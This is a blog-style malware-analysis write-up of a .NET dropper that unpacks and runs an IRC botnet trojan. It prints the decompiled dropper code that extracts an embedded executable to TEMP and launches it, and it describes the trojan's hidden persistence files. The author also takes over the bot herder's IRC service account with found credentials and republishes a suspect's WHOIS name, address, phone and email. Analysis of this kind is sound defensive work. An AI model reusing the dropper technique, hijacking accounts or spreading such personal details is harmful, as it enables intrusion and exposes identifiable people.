After monitoring MalwareDomainList.com, I noticed an interesting piece of malware showing up on the Recent Updates. It was hosted on OAST.com which is a pretty high-traffic site. I decided to grab a copy of the binary and load it into my VM. To my surprise, it was the first .NET dropper I have came across [...]
After monitoring MalwareDomainList.com, I noticed an interesting piece of malware showing up on the Recent Updates. It was hosted on OAST.com which is a pretty high-traffic site. I decided to grab a copy of the binary and load it into my VM. To my surprise, it was the first .NET dropper I have came across in the wild.
Tools Used
- PEiD
- Wireshark
- ProcMon
- Reflector
- mIRC (yes, seriously lol)
Checking PE
I opened the malware with PEiD and noticed it was a .NET Trojan. This made for an easy and quick reverse engineer.
PEiD - Soulmate
Disassemble and Analyze
Since .NET can easily be decompiled, I launched Red Gate Reflector and opened the binary up to see whats going on inside. Looks like the developer either lacks knowledge on obfuscation or is simply wanting to do it manually. I went straight to the Form1_Load to see what happens since this is more then likely going to be the first code execution.
Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs)
Dim tempPath As String = Path.GetTempPath
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, _
OpenAccess.Read, OpenShare.Shared, -1)
Dim str2 As String = Strings.Space(CInt(FileSystem.LOF(1)))
FileSystem.FileGet(1, (str2), -1, False)
FileSystem.FileClose(New Integer() { 1 })
Dim str3 As String = Form1.t6CEBpl0pZRC46YkNNwiunb(Strings.Split(str2, _
"@KSJDFSDKFJSDLFJSLKFjslkdfjlKSDJflkSJDflkjdfkjsdlk@", _
-1, CompareMethod.Binary)(1), "kSjdflskdfj293857OLSKDjflkksdfj9827352lssjdf2983572o3ijLSKDfjlskjfsf")
FileSystem.FileOpen(2, (tempPath & "\Out.exe"), OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default, -1)
FileSystem.FilePut(2, str3, -1, False)
FileSystem.FileClose(New Integer() { 2 })
Process.Start((tempPath & "\Out.exe"))
Me.Close
End Sub
It looks fairly straight forwarded.
1) Locates the TEMP path
2) Read the executing assembly
3) Calls a function that strips the embedded binary into a separate string
4) Writes the embedded binary into Out.exe in the TEMP path
5) Executes the embedded binary
PEiD on the trojan binary
I decided to write a quick application in .NET to extract the embedded binary using the decompiled code from the dropper. Using PEiD on the new trojan, I noticed it was nothing more then a compressed executable.
PEiD - Trojan
I just went ahead and extracted the contents using WinRar and found 2 mIRC scripts, 3 text files, and an image.
Extract - Trojan
See crime.mrc
See ok.mrc
See image.jpg
Just by looking at the crime.mrc you can tell what the trojan is going to do. It contains the instructions for the backdoor when its executed.
Soulmate crime.mrc analysis
1) When it first starts it executes the .st logic
2) It reads the text files and sets random nickname/realname/ident
3) Sets a bunch of settings
4) Connects to the UnderNET irc network
5) Logs in to cservice using the username: shakay
6) Sets notify on a bunch of nicknames
Playing with the trojan
So, noticing how lame this botnet really looks on the inside I decided to fire-up Wireshark and Procmon. I launched the dropper and immediately noticed IRC traffic along with a nice image pop up. I would post the Wireshark capture but its pretty newbish.
I looked at ProcMon and seen that it did indeed save Out.exe along with a bunch of other files as hidden system files into a TEMP path.
- daemon.exe – a mIRC client binary
- temporarly.reg – registry settings for start-up execution
- catchme.bat – a batch file for executing everything
In the folder also contained the extraction of the Trojan.
Developer Signature
Going back to the earlier .NET dis-assembly, I looked for a unique string that might help me identify the developer. The first one I tried was the string:
Google Search: Strings.Space(CInt(FileSystem.LOF(1)))
I jumped straight into google and guess what I found? A Pastebin of the signature match as the first result. Gotta love Google!
See String Match
Looks like the Pastebin code is a VB.NET binder/crypter that attempts to evade detection from many known applications and also uses the same coding methodology our dropper uses. Hmmm… who is this RiverThief guy that posted the Pastebin?
Let’s try out our friend, Google, again!
Google Search: riverthief malware
Google - RiverThief Malware
The thing I love about Google is how it always cache’s sites. It looks like our RiverThief guy has some connection to writing undetectable malware and owns a botnet. Also in the results, you notice two domains www.riverthief.info and riverthief.co.cc. I went ahead and grabbed the Registrar information for riverthief.info.
Registrant ID:CR40000685 Registrant Name:River Thief Registrant Organization: Registrant Street1:654 verginia lane Registrant Street2: Registrant Street3: Registrant City:Houston Registrant State/Province:Texas Registrant Postal Code:77042 Registrant Country:US Registrant Phone:+1.2814441585 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:riverthief@live.com
RiverThief Home
RiverThief - Phone
Playing on IRC
So I fired up mIRC, used some settings from the text files earlier, and joined #soulmate since I found that channel in the crime.mrc. Immediately a user nicknamed “wolf” tried to issue commands to me. I sent him a private message refusing to comply. LOL! I manually authenticated using the shakay user, logged into cservice’s website, and changed shakay’s password.
Wolf wasn’t very happy. He kick/banned me with some vulgar language. Then he invited me back into the channel begging me to release the shakay username (which was registered to the email: shakay@url.ro). All he had to do was reset the password.
Conclusion
Malware writers and bot herders seem to be using the same old tricks with newer technologies. Although the .NET framework is required for this dropper to backdoor the machine, .NET is becoming more and more popular. This will prove to enable malware writers to build droppers very easily. The person behind this one obviously didn’t spend too much time making this.
Chances are either some romanian hacker grabbed RiverThief’s VB.NET code and took a shot at it or RiverThief is behind this botnet. Either way, it was rookie malware and simple to reverse.
All Tags: .Net, malware analysis, reverse engineer, soulmate botnet, trojan, VB.Net
2 Responses
Hey Mike. very cool article. I am such a newbie at this. What I loved about this article is your thought process. The investigative techinques to backtrack. love it.
nice post. thanks.